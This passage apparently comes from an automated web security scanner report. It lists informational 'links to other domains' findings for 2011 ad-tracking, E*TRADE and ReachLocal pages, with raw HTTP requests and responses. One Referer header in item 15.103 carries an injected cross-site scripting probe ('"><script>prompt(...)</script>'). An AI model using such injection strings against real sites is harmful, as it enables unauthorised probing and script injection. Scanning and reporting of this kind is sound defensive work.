<!-- Yahoo! Web Analytics - All rights reserved -->
<script type="text/javascript" src="http://d.yimg.com/mi/ywa.js"></script>
...[SNIP]...
<noscript><img width=1 height=1 alt="" src="http://csc.beap.ad.yieldmanager.net/i?bv=1.0.0&bs=(128nc2v3f(gid$0QKTVmKIPE7pARpjTl.wjQLGMhd7ak5mFbkACuv1,st$1315313081798920,v$1.0))&t=J_3-D_3"></noscript>
...[SNIP]...

15.100. http://udmserve.net/udm/img.fetch  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://udmserve.net
Path:   /udm/img.fetch

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /udm/img.fetch?sid=2900;tid=1;ev=1;dt=1; HTTP/1.1
Host: udmserve.net
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/ober.frontier/product_undefined;dc_seed=;tile=4;sz=728x90;ord=8383746361359954?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
P3P: CP='NOI DSP CURa ADMa DEVa PSAa PSDa OUR IND UNI COM NAV INT'
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP CURa ADMa DEVa PSAa PSDa OUR IND UNI COM NAV INT"
Set-Cookie: udm1=9173:1:63440343958:2:2900:0:0:63440343958:1:1|; domain=udmserve.net; path=/; expires=Wed, 05-Sep-2012 12:45:58 GMT
Set-Cookie: dt=9b3eab00-120f-460c-84d6-3607c7ca9d48; domain=udmserve.net; path=/; expires=Wed, 05-Sep-2012 12:45:58 GMT
Expires: Mon, 05 Sep 2011 12:45:58 GMT
Date: Tue, 06 Sep 2011 12:45:58 GMT
Content-Type: text/html; charset=ISO-8859-1
Server: lighttpd/1.4.28
Content-Length: 1337

<!DOCTYPE html
   PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
    "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en-US" xml:lang="en-US">
<
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
<noscript>
<img src="http://pixel.quantserve.com/pixel/p-effSsmMYCbAck.gif" style="display: none;" border="0" height="1" width="1" alt="Quantcast"/>
</noscript>
...[SNIP]...

15.101. https://us.etrade.com/e/t/jumppage/viewjumppage  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://us.etrade.com
Path:   /e/t/jumppage/viewjumppage

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /e/t/jumppage/viewjumppage?PageName=top_bullish_stocks&SC=S047401&o_id=60DAY+500&symbol=&ch_id=d&s_id=yhoo&c_id=BLLST HTTP/1.1
Host: us.etrade.com
Connection: keep-alive
Referer: http://ad.wsod.com/embed/457d7d7cd3cd82d66ba00fc48f756260/68.0.iframe.120x60/1315313295039208?yud=smpv%3d3%26ed%3dKfb2BHkzcaa_Ez5Am4dvC37N1raRCR5h1JWlV.d5tpky0b8xMSZkytDAsrQiWlFiRI7KrmsgZd3dnvnG&encver=1&encalgo=3DES-CFB-SHA1&app=apt&intf=1&click=http://global.ard.yahoo.com/SIG=15sm6vod4/M=601843023.602979803.858295551.859733051/D=fin/S=95993639:FB2/Y=YAHOO/EXP=1315320495/L=2tovE0PDkjjpARpjTl.wjQOcMhd7ak5mFo4ADnpR/B=sWXyAdBDRyg-/J=1315313295039208/K=kYjDTKuicqWfKJal7_1uqQ/A=3686351322249551559/R=0/X=3/*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:49:06 GMT
Server: Apache
Keep-Alive: timeout=60, max=400
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 24371


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
    <title>Today's Top 10 Bullish Stocks | E*TRADE Securities</title>
   
...[SNIP]...
<![endif]-->
   
    <script TYPE="text/javascript" SRC="https://a248.e.akamai.net/n/248/1777/0906201105/www.etrade.com/js/nav.js" ></script>
    <script TYPE="text/javascript" SRC="https://a248.e.akamai.net/n/248/1777/0906201105/www.etrade.com/javascript/global_nav.js" ></script>
    <script TYPE="text/javascript" SRC="https://a248.e.akamai.net/n/248/1777/0906201105/www.etrade.com/javascript/jquery/jquery.min.js" ></script>
    <script TYPE="text/javascript" SRC="https://a248.e.akamai.net/n/248/1777/0906201105/www.etrade.com/javascript/prospect/tooltip_popup.js" ></script>
    <!-- Site Catalyst -->
    <script TYPE="text/javascript" SRC="https://a248.e.akamai.net/n/248/1777/0906201105/www.etrade.com/javascript/omntr/s_code.js" ></script>
    <script TYPE="text/javascript" SRC="https://a248.e.akamai.net/n/248/1777/0906201105/www.etrade.com/javascript/omntr/mbox.js" ></script>
...[SNIP]...
<!-- CSS -->
<link REL="stylesheet" TYPE="text/css" HREF="https://a248.e.akamai.net/n/248/1777/0906201105/www.etrade.com/stylesheet/prospect.css" />
   </head>
...[SNIP]...
<noscript>
<iframe src="https://fls.doubleclick.net/activityi;src=865138;type=etrad583;cat=;ord=1?" width="1" height="1" frameborder="0"></iframe>
...[SNIP]...
<div class="popupWin toggleStyle" id="popupImg" onMouseOut="javascript:hidePopupBox('popupImg');" onMouseOver="javascript:showPopupBoxMore();">
   <img USEMAP="#getDetails" NAME="getDetailsImg" ID="getDetailsImg" HEIGHT="200" SRC="https://a248.e.akamai.net/n/248/1777/0906201105/www.etrade.com/rtpublish/images/jp_olatf60_pop.png" BORDER="0" WIDTH="279" />
</div>
...[SNIP]...
<div style="position:absolute;">
               <img USEMAP="#logomap" HEIGHT="200" SRC="https://a248.e.akamai.net/n/248/1777/0906201105/www.etrade.com/rtpublish/images/jp_15037_header-bearish.png" BORDER="0" WIDTH="970" />
           </div>
...[SNIP]...
<NOSCRIPT><a href="//etrade.wsod.com/click/6dff618a4426d4ef3931d4e373e86b4d/38.67.img.0x0/" target="_blank"><img SRC="//etrade.wsod.com/embed/6dff618a4426d4ef3931d4e373e86b4d/38.67.img.0x0/" /></a>
...[SNIP]...
<NOSCRIPT><a href="//etrade.wsod.com/click/6dff618a4426d4ef3931d4e373e86b4d/39.68.img.0x0/" target="_blank"><img SRC="//etrade.wsod.com/embed/6dff618a4426d4ef3931d4e373e86b4d/39.68.img.0x0/" /></a>
...[SNIP]...
<div class="subhead_evenmore">
                       <img HEIGHT="42" SRC="https://a248.e.akamai.net/n/248/1777/0906201105/www.etrade.com/rtpublish/images/jp_14909_subhead-get-even-more.png" BORDER="0" WIDTH="246" />
                   </div>
...[SNIP]...
<div class="FLticker">
                           <img ALT="Easy-to-use idea generating tools" HEIGHT="50" SRC="https://a248.e.akamai.net/n/248/1777/0906201105/www.etrade.com/rtpublish/images/jp_14909_icon-tools.png" WIDTH="50" TITLE="Easy-to-use idea generating tools" />
                       </div>
...[SNIP]...
<div class="FLticker imgtick">
                           <img ALT="Find investments with Easy-to-use idea generating tools" HEIGHT="50" SRC="https://a248.e.akamai.net/n/248/1777/0906201105/www.etrade.com/rtpublish/images/jp_14909_icon-top5lists.png" WIDTH="50" TITLE="Find investments with Easy-to-use idea generating tools" />
                       </div>
...[SNIP]...
<div class="FLticker imgtick">
                           <img ALT="See The Top Mistakes Traders Make" HEIGHT="50" SRC="https://a248.e.akamai.net/n/248/1777/0906201105/www.etrade.com/rtpublish/images/jp_14909_icon-3minvideos.png" WIDTH="50" TITLE="See The Top Mistakes Traders Make" />
                       </div>
...[SNIP]...
<div class="tickerrail1 tickerrail-topPadding"><img USEMAP="#howitworks" ID="hiwImg" HEIGHT="137" SRC="https://a248.e.akamai.net/n/248/1777/0906201105/www.etrade.com/rtpublish/images/jp_14909_cta-tradefree-500.png" BORDER="0" WIDTH="264" /></div>
...[SNIP]...
<div>
           <img SRC="https://a248.e.akamai.net/n/248/1777/0906201105/www.etrade.com/rtpublish/images/jp_14827_bottom-box-simple.png" BORDER="0" />
       </div>
...[SNIP]...
<div class="need-help-img"><img HEIGHT="85px" SRC="https://a248.e.akamai.net/n/248/1777/0906201105/www.etrade.com/rtpublish/images/jp_14758_need-help-people_02_02_2011.png" WIDTH="105px" /></div>
           <div class="cust-ser-icon-div"><img HEIGHT="45px" SRC="https://a248.e.akamai.net/n/248/1777/0906201105/www.etrade.com/rtpublish/images/jp_14758_icon-customer-service_02_02_2011.png" WIDTH="44px" /></div>
...[SNIP]...
<div class="icon-call"><img HEIGHT="51px" SRC="https://a248.e.akamai.net/n/248/1777/0906201105/www.etrade.com/rtpublish/images/jp_14758_icon-call_02_02_2011.png" WIDTH="46px" /></div>
...[SNIP]...
<div class="branch-icon"><img HEIGHT="38px" SRC="https://a248.e.akamai.net/n/248/1777/0906201105/www.etrade.com/rtpublish/images/jp_14758_icon-branches_02_02_2011.png" WIDTH="59px" /></div>
...[SNIP]...
<a href="/e/t/welcome/whychooseetrade"><img HEIGHT="46px;" SRC="https://a248.e.akamai.net/n/248/1777/0906201105/www.etrade.com/rtpublish/images/jp_14758_5star-trading-tools-customer-service-footer_02_03_2011.png" WIDTH="222px;" /></a>
...[SNIP]...
<a href="/e/t/mobile_pro"><img HEIGHT="38px" SRC="https://a248.e.akamai.net/n/248/1777/0906201105/www.etrade.com/rtpublish/images/jp_14758_footer-icon-mobile.png" WIDTH="38px" /></a>
...[SNIP]...
<a class="footer-four-img-margin" href="/e/t/jumppage/viewjumppage?PageName=etrade_super_tv_ads"><img HEIGHT="38px" SRC="https://a248.e.akamai.net/n/248/1777/0906201105/www.etrade.com/rtpublish/images/jp_14758_footer-icon-tv.png" WIDTH="39px" /></a>
...[SNIP]...
<a class="footer-four-img-margin" href="javascript:etWin('/e/t/jumppage/viewjumppage?PageName=facebook_footer','facebook',1000,700,'no','no','yes','no','yes',20,20,'');"><img HEIGHT="38px" SRC="https://a248.e.akamai.net/n/248/1777/0906201105/www.etrade.com/rtpublish/images/jp_14758_footer-icon-facebook.png" WIDTH="38px" /></a>
                <a class="footer-four-img-margin" href="javascript:etWin('/e/t/jumppage/viewjumppage?PageName=youtube_footer','youtube',1000,700,'no','no','yes','no','yes',20,20,'');"><img HEIGHT="37px" SRC="https://a248.e.akamai.net/n/248/1777/0906201105/www.etrade.com/rtpublish/images/jp_14758_footer-icon-youtube.png" WIDTH="38px" /></a>
...[SNIP]...

15.102. http://utdi.reachlocal.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://utdi.reachlocal.com
Path:   /

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /?scid=2323693&kw=233292&pub_cr_id=8668759748 HTTP/1.1
Host: utdi.reachlocal.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=telephone+service
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Tue, 06 Sep 2011 11:52:02 GMT
Server: Apache
Set-Cookie: RlocalUID=scid%3D2323693%26cid%3D837045%26tc%3D11090604520225798%26kw%3D233292; domain=.reachlocal.com; path=/
Set-Cookie: RlocalHilite=kw_hilite_off%3D0%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice; domain=.reachlocal.com; path=/
Set-Cookie: RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0; domain=.reachlocal.com; path=/
Location: http://redirect.rtrk.com/redirect?RL_rurl=http://utdi.reachlocal.com/coupon/&RL_qstr=scid%3D2323693%26cid%3D837045%26tc%3D11090604520225798%26rl_key%3D747249abb89e424959a67c34a59e232e%26kw%3D233292%26dynamic_proxy%3D1%26primary_serv%3Dutdi.reachlocal.net%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice%26pub_cr_id%3D8668759748&RL_ckstr=RlocalUID%3Dscid%253D2323693%2526cid%253D837045%2526tc%253D11090604520225798%2526kw%253D233292%3BRlocalHilite%3Dkw_hilite_off%253D0%2526se_refer%253Dhttp%25253A%25252F%25252Fwww.google.com%25252Fsearch%25253Fsourceid%25253Dchrome%252526ie%25253DUTF-8%252526q%25253Dtelephone%25252Bservice%3BRlocalTiming%3Dlanding_loadtime_off%253D0%2526retarget_off%253D0
Vary: Accept-Encoding
Content-Length: 1036
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7e45525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:16:55 GMT;path=/;httponly

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://redirect.rtrk.com/redirect?RL_rurl=http://utdi.reachlocal.com/coupon/&amp;RL_qstr=scid%3D2323693%26cid%3D837045%26tc%3D11090604520225798%26rl_key%3D747249abb89e424959a67c34a59e232e%26kw%3D233292%26dynamic_proxy%3D1%26primary_serv%3Dutdi.reachlocal.net%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice%26pub_cr_id%3D8668759748&amp;RL_ckstr=RlocalUID%3Dscid%253D2323693%2526cid%253D837045%2526tc%253D11090604520225798%2526kw%253D233292%3BRlocalHilite%3Dkw_hilite_off%253D0%2526se_refer%253Dhttp%25253A%25252F%25252Fwww.google.com%25252Fsearch%25253Fsourceid%25253Dchrome%252526ie%25253DUTF-8%252526q%25253Dtelephone%25252Bservice%3BRlocalTiming%3Dlanding_loadtime_off%253D0%2526retarget_off%253D0">here</a>
...[SNIP]...

15.103. http://utdi.reachlocal.net/index.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://utdi.reachlocal.net
Path:   /index.html

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /index.html?scid=2323693&cid=e78be HTTP/1.1
Host: utdi.reachlocal.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://utdi.reachlocal.com/coupon/?scid=2323693&cid=e78be%22%3E%3Cscript%3Eprompt(%22E-Mail%22)%3C/script%3E08a96ad64a0&tc=11090604520111271&rl_key=e2e30c5686d91c3f4971163361e1b86a&kw=233292&dynamic_proxy=1&primary_serv=utdi.reachlocal.net&se_refer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dtelephone%2Bservice&pub_cr_id=8668759748

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:09:52 GMT
Server: ConcentricHost-Ashurbanipal/2.0 (Concentric(R))
X-RL-Host: pweb101
X-Robots-Tag: noindex,nofollow
Last-Modified: Wed, 31 Aug 2011 22:29:49 GMT
ETag: "15f966a-5607-4e5eb5dd"
Accept-Ranges: bytes
Content-Type: text/html
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR"
Vary: Accept-Encoding
Content-Length: 22612
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7445525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:34:45 GMT;path=/;httponly

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head><meta name="robots" content="noindex,nofollow" />
<meta http-equiv="Content-Type" co
...[SNIP]...
<td bgcolor="#016FAA"><img src="//rtsys.rtrk.com/campaign_images/d837/837045/utdi-tophead_8772671235.jpg" width="800" height="110" border="0" usemap="#Map"></td>
...[SNIP]...
<noscript><object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=9,0,28,0" width="780" height="220" title="Header">
<param name="movie" value="UTDI-flasheader.swf">
...[SNIP]...
<td class="maintext"><a href="http://service.utdi.com/portal/customer/customerlogin.asp?logout=auto" TARGET="RL_top"> <span class="maintext2">
...[SNIP]...
</table>
<a href="http://www.utdistore.com/" TARGET="_blank"><img src="images/Rsidepanel_UTDiStore.jpg" width="260" height="136" border="0">
...[SNIP]...
<td valign="top" class="maintext"><a href="http://rtsys.rtrk.com/coupon/?scid=2323683&cid=837045&tc=11090605095230846&ptt=4&target_email=kheckaman@utdi.com" TARGET="RL_top"><img src="images/spacer.gif" width="221" height="95" border="0">
...[SNIP]...
</strong><a href="http://www.zoomerang.com/Survey/?p=WEB228CDDGAGTE" class="onbluemenu">We care! <br>
...[SNIP]...
<u><a href="http://www.utdi.com/survey-1.html" class="onbluemenu"><strong>
...[SNIP]...
</u>&nbsp;to give us your feedback.
For Project/Installation feedback, <a href="http://www.utdi.com/survey-2.html" class="onbluemenu"><strong>
...[SNIP]...
<div align="right"><a href="http://www.facebook.com/pages/UTDi/111259549273#/pages/UTDi/111259549273" TARGET="_blank"><img src="/images/Bottom_facebook.jpg" width="243" height="37" border="0">
...[SNIP]...
<span class="maintext"><a href="http://rtsys.rtrk.com/coupon/?scid=2323683&cid=837045&tc=11090605095230846&ptt=4&target_email=info@utdi.com" TARGET="RL_top" class="onbluemenu">info@utdi.com</a>
...[SNIP]...
</html>

<script type="text/javascript" src="//rtsys.rtrk.com/js/TrackLandingPage_src.js">
</script>
...[SNIP]...

15.104. http://view.atdmt.com/TR1/iview/332867993/direct/01  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://view.atdmt.com
Path:   /TR1/iview/332867993/direct/01

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /TR1/iview/332867993/direct/01?time=1315313115&click=http://ads.bluelithium.com/clk?3,eAGlUE1zokAU.DN72jIMM8N8EGoOg0AEJIrBVbxYCAkGYUEkQfPrl1qjtfd9l-56H931GmLjVcOQchViFVHyxqgBMcKvKaGQZyPVMAyqI6RhovHR2l9a0i-yJ2ke3WYpr9U2XvhNpQyke-OqlKG0xh79GPBv-cnpfJv-H1qZdzcaDPOrWrGaOPPCNe.alt3HUQyfv-x-ugq1mRV3QeSUwRi-b6IDmUaptomyQxD9qp5RoMX9.VKM9l3XPAKQl.UuKZWkzZRLsq9rJa0r8OI-CUga-PF21I8gEIwzjrECNY0TXWcDGTLkGCmcDD1GgSVOTd12J.AiEKFU44g8Bu4cge2l7ISscjRzXJp65bJ088qiKMKOSn7HqQliEcvJbAbs9VxADAlGKlYJmIq0bs7ble.ObdbIRVNEpdIXoceDfcaSA6mczJbj6fYLmGL92Z5lZlqLS.4AvKvMoKUSBjHXGfBFy5N-nS4P3qTY7d5xuLns0joEUlDENTasLIQKfv64pXL95p9E.gD-PabZ, HTTP/1.1
Host: view.atdmt.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?XKUDAKjdGABqIpUAAAAAAArpJQAAAAAAAAAMAIAAAAAAAA0AAQADCJ6uAQAAAAAAKasxAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADdJAIAAAAAAAIAAgAAAAAAAIBYzSd4lD8AAMR19m7APwAAAAAAAAAAAADEdfZuwD8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADkUwEvWfquCkNTvJHg9xPRNBp4BwKItE8yE2ryAAAAAA==,http%3A%2F%2Fglobal.ard.yahoo.com%2FSIG%3D15p1ufq9q%2FM%3D787833.14485997.14323832.8514476%2FD%3Dsports%2FS%3D25664825%3AMIP2%2F_ylt%3DAmg2OFI6cJlUlIgmD62T3F05nYcB%2FY%3DYAHOO%2FEXP%3D1315320305%2FL%3Dcopx_WKIPE7pARpjTl.wjQJ8Mhd7ak5mFdEACL_z%2FB%3DXvrxAdBDRyg-%2FJ%3D1315313105713897%2FK%3Dr8awXcUkJHjbbi3QZybcoQ%2FA%3D6284797%2FR%3D0%2F%2A%24,http%3A%2F%2Fsports.yahoo.com%2F,B%3D10%26D%3Dzip%253D%2526ycg%253D%2526yyob%253D%26S%3D14485997%26Z%3D300x100%26_PVID%3Dcopx%255fWKIPE7pARpjTl.wjQJ8Mhd7ak5mFdEACL%255fz%26_salt%3D3618678928%26cb%3D1315313105713897%26i%3D140509%26r%3D0,10a65710-d886-11e0-be99-78e7d15f7c8c
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AA002=1314814617-3398750; TOptOut=1; MUID=9FA60E9E25934DD3BB2BBC07F1AAFA23

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Type: text/html
Expires: 0
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 12:45:14 GMT
Connection: close
Content-Length: 9400

<html><head><title>multipolicy_300x100</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head><body style="border-width:0px;margin:0px;"
...[SNIP]...
<div style="display: none">
<img src="http://testdm.travelers.com/trvwics.gif?TraceAgent=IMP&ad_id=222372080&siteAlias=332867993"/>
</div>
...[SNIP]...
<noscript>
<a target="_blank" href="http://ads.bluelithium.com/clk?3,eAGlUE1zokAU.DN72jIMM8N8EGoOg0AEJIrBVbxYCAkGYUEkQfPrl1qjtfd9l-56H931GmLjVcOQchViFVHyxqgBMcKvKaGQZyPVMAyqI6RhovHR2l9a0i-yJ2ke3WYpr9U2XvhNpQyke-OqlKG0xh79GPBv-cnpfJv-H1qZdzcaDPOrWrGaOPPCNe.alt3HUQyfv-x-ugq1mRV3QeSUwRi-b6IDmUaptomyQxD9qp5RoMX9.VKM9l3XPAKQl.UuKZWkzZRLsq9rJa0r8OI-CUga-PF21I8gEIwzjrECNY0TXWcDGTLkGCmcDD1GgSVOTd12J.AiEKFU44g8Bu4cge2l7ISscjRzXJp65bJ088qiKMKOSn7HqQliEcvJbAbs9VxADAlGKlYJmIq0bs7ble.ObdbIRVNEpdIXoceDfcaSA6mczJbj6fYLmGL92Z5lZlqLS.4AvKvMoKUSBjHXGfBFy5N-nS4P3qTY7d5xuLns0joEUlDENTasLIQKfv64pXL95p9E.gD-PabZ,http://clk.atdmt.com/go/332867993/direct;ai.222372080;ct.1/01"><img border="0" src="HTTP://spe.atdmt.com/ds/TRATR11234001/300x100/multipolicy_300x100.jpg?ver=1" width="300" height="100" />
...[SNIP]...
</noscript>
<script type="text/javascript" language="javascript" src="http://cdn.doubleverify.com/script361.js?agnc=1024037&cmp=123400100201TR1&crt=&crtname=&adnet=&dvtagver=3.3.1346.2176&adsrv=2&plc=332867993&advid=1024038&sid=332867993&adid="></script><script type="text/javascript" language="javascript" src="http://cdn.doubleverify.com/script361.js?agnc=1024037&cmp=1042775&crt=&crtname=&adnet=&dvtagver=3.3.1346.2176&adsrv=2&plc=332867993&advid=1043704&sid=332867993&adid="></script>
...[SNIP]...

15.105. http://view.atdmt.com/TR1/iview/332867993/direct/01  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://view.atdmt.com
Path:   /TR1/iview/332867993/direct/01

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /TR1/iview/332867993/direct/01?time=1315313290&click=http://ads.bluelithium.com/clk?3,eAGlUU2TmkAQ.TM5pYzzzcwuNYfBcVfEEUH8IJcUwi6KGFTYws2vDwmllXveoft1d.Xr6m5EbMYzCEWWQQIJT9-IjQgmb6mAqbUbQNu2CUFPFuZ4sPVWWk1Gc1c5F.e8Un.hxR9ez.7YQLn3oKvnSo-m1keX7TEz8F79P6-z6WNQNzDv1ZL2l7soXOehrVMWbwJmdNrONgH1ddyY6KU0I3Qw2qWzKKXfo-xoovVpjg2N20enHOyb5vwMQF5Wu6QcJtds-Jnsq2qYViewdF8lYpcDFO9PGBjJBReEDBEVEBLKO8I6YNQRxDnFHGhZn6trU4OlxMyyqMDs2YTjEfjxWTZSFWvrctzVae1fJ-GNxZ4fHyBkP-PUAbGM1cT3wXi7kIggRjCkQoCZrLfzIn.13MWYn1V4LqJy2BaBOZl9xpMjO71UuXLMRgFHwmYZBo2jw9PqG5j2Mt2bhWDQwhgDT8biQhtye9ftaJbrxW1ixus2AEpalFFEKAglBF-.3M.Sb.PPSX4D3Eql3w==, HTTP/1.1
Host: view.atdmt.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?XKUDAHCNIABqIpUAAAAAAKYuKAAAAAAAAAAQAIAAAAAAAAUAAgADCJ6uAQAAAAAAALM0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADdJAIAAAAAAAIAAgAAAAAAAIBYzSd4lD8AAPCruVfhPwAAAAAAAAAAAADwq7lX4T8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADd5E4gCvuuCmn8vdUdl6S1TDMb1u7FHz62Qp-OAAAAAA==,http%3A%2F%2Fglobal.ard.yahoo.com%2FSIG%3D15qi08f92%2FM%3D787833.14800347.14555521.14177427%2FD%3Dsports%2FS%3D25664825%3AMREC%2F_ylt%3DAjV6qkbscsOrHRx5YKOYi005nYcB%2FY%3DYAHOO%2FEXP%3D1315320488%2FL%3DsXNjgGKIPE7pARpjTl.wjQMmMhd7ak5mFogABMWA%2FB%3D0tSRQtBDRmU-%2FJ%3D1315313288506222%2FK%3DY8q4t3xfDwCLgDPxHMEVwQ%2FA%3D6454134%2FR%3D0%2F%2A%24,http%3A%2F%2Fsports.yahoo.com%2F,B%3D10%26S%3D14800347%26Z%3D300x100%26_PVID%3DsXNjgGKIPE7pARpjTl.wjQMmMhd7ak5mFogABMWA%26_salt%3D1959032721%26cb%3D1315313288506222%26i%3D140509%26r%3D0%26ycg%3D%26yyob%3D%26zip%3D,79ad9070-d886-11e0-b028-78e7d15f7c8c
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AA002=1314814617-3398750; TOptOut=1; MUID=9FA60E9E25934DD3BB2BBC07F1AAFA23

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Type: text/html
Expires: 0
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 12:48:10 GMT
Connection: close
Content-Length: 9393

<html><head><title>multipolicy_300x100</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head><body style="border-width:0px;margin:0px;"
...[SNIP]...
<div style="display: none">
<img src="http://testdm.travelers.com/trvwics.gif?TraceAgent=IMP&ad_id=222372080&siteAlias=332867993"/>
</div>
...[SNIP]...
<noscript>
